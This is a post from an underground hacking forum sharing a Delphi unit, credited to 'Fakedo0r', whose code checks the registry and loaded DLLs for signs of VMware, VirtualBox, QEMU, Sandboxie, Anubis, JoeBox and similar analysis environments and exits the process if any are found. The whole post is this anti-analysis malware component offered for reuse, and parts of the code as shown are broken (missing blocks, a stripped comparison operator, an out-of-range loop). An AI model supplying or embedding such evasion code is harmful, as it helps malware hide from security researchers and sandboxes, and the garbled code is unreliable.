HTDark | Underground Hacking Forum and Cybersecurity Community
  • Earn real money by being active: Hello Guest, earn real money by simply being active on the forum — post quality content, get reactions, and help the community. Once you reach the minimum credit amount, you’ll be able to withdraw your balance directly. Learn how it works.

Delphi Antis [Maquinas Virtuales / Sandbox's] [Delphi] [Fakedo0r]

Status
Not open for further replies.
S

sQuo

~ KillmeMories ~
Shadow
User
Joined
Oct 16, 2011
Messages
5,851
Reputation
0
Reaction score
22,904
Points
688
Credits
0
‎13 Years of Service‎
24%
Code: 
>  //******************************************************************************
   //Unit        : ANTIS
   //Autor       : Fakedo0r .:[PD-TEAM]:.
   //Fecha       : 04.04.2012
   //Creditos    : Cobein
   //Descripcion : Detecta [VirtualPC / VMWare / VirtualBox / Anubis]
   //              Detecta [sandboxie / ThreatExpert / CWSandbox / JoeBox]
   //Uso         : Anti_End;
   //******************************************************************************
   unit ANTIS;
   //******************************************************************************
   //DECLARACION DE CLASES
   //******************************************************************************
   interface
   uses
     Windows, ShlObj, Messages, SysUtils, Vcl.Dialogs;
   //******************************************************************************
   //DECLARACION DE FUNCIONES / PROCEDIMIENTOS
   //******************************************************************************
   function InStr(iStart: Integer; sSource: String; sSourceToFind: String): integer;
   function TrimA(sCadena: String): String;
   function IsVirtualPCPresent: Bool;
   function IsInSandbox: Bool;
   function Anti_End: Bool;
   //******************************************************************************
   //FUNCIONES / PROCEDIMIENTOS
   //******************************************************************************
   implementation
   //******************************************************************************
   //
   //******************************************************************************
   function IsVirtualPCPresent: Bool;
   const
     sArrVM    :array[0..3] of string = ('VIRTUAL', 'VMWARE', 'VBOX', 'QEMU');
   var
     hlKey     :HKEY;
     sBuffer   :String;
     i         :Integer;
     iRegType  :Integer;
     iDataSize :Integer;
   begin
     IsVirtualPCPresent := False;
     iRegType := 1;
    
     if RegOpenKeyEx($80000002, Pchar('SYSTEM\ControlSet001\Services\Disk\Enum'), 0, $20019, hlKey) = 0 then
       if RegQueryValueEx(hlKey, '0', 0, @iRegType, nil, @iDataSize) = 0 then
         SetLength(sBuffer, iDataSize);
         RegQueryValueEx(hlKey, '0', 0, @iRegType, PByte(PChar(sBuffer)), @iDataSize);
    
         for I := 0 to 3 do
           if InStr(1, UpperCase(TrimA(sBuffer)), UpperCase(sArrVM[i])) > 0 then
             IsVirtualPCPresent := True;
    
       RegCloseKey(hlKey);
   end;
   //******************************************************************************
   //
   //******************************************************************************
   function IsInSandbox: Bool;
   const
     sArrSB      :array[0..1] of string = ('76487-644-3177037-23510',
                                           '55274-640-2673064-23950');
     sArrDll     :array[0..1] of string = ('sbiedll.dll', 'dbghelp.dll');
   var
     hlKey       :HKEY;
     sBuffer     :String;
     i           :Integer;
     hDll        :Integer;
     iRegType    :Integer;
     iDataSize   :Integer;
     hSnapShot   :Integer;
   begin
     IsInSandbox := False;
     iRegType := 1;
    
     hDll := LoadLibrary(PChar(sArrDll[0]));
    
     if hDll  0 then
       IsInSandbox := True;
    
     FreeLibrary(hDll);
    
     hDll := LoadLibrary(PChar(sArrDll[1]));
    
     if hDll  0 then
       IsInSandbox := True;
    
     FreeLibrary(hDll);
    
     if RegOpenKeyEx($80000002, Pchar('Software\Microsoft\Windows\CurrentVersion'), 0, $20019, hlKey) = 0 then
       if RegQueryValueEx(hlKey, 'ProductId', 0, @iRegType, nil, @iDataSize) = 0 then
         SetLength(sBuffer, iDataSize);
         RegQueryValueEx(hlKey, 'ProductId', 0, @iRegType, PByte(PChar(sBuffer)), @iDataSize);
    
         for I := 0 to 2 do
           if InStr(1, TrimA(sBuffer), sArrSB[i]) > 0 then
             IsInSandbox := True;
    
       RegCloseKey(hlKey);
   end;
   //******************************************************************************
   //
   //******************************************************************************
   function InStr(iStart: Integer; sSource: String; sSourceToFind: String): Integer;
   begin
      Result := Pos(sSourceToFind, Copy(sSource, iStart, Length(sSource) - (iStart - 1)));
   end;
   //******************************************************************************
   //
   //******************************************************************************
   function TrimA(sCadena: String): String;
   begin
     Result := '';
    
     if sCadena = '' then Exit;
    
     while sCadena[1] = ' ' do
     begin
       Delete(sCadena, 1, 1);
    
       if sCadena='' then Exit;
     end;
    
     while sCadena[Length(sCadena)] = ' ' do
     begin
       Delete(sCadena,Length(sCadena),1);
    
       if sCadena  = '' then Exit;
     end;
    
     Result :=  sCadena;
   end;
   //******************************************************************************
   //
   //******************************************************************************
   function Anti_End: Bool;
   begin
     Anti_End := False;
    
     if IsVirtualPCPresent = True or IsInSandbox = True then
       ExitProcess(0);
   end;
    
   end.
 
Status
Not open for further replies.
Back
Top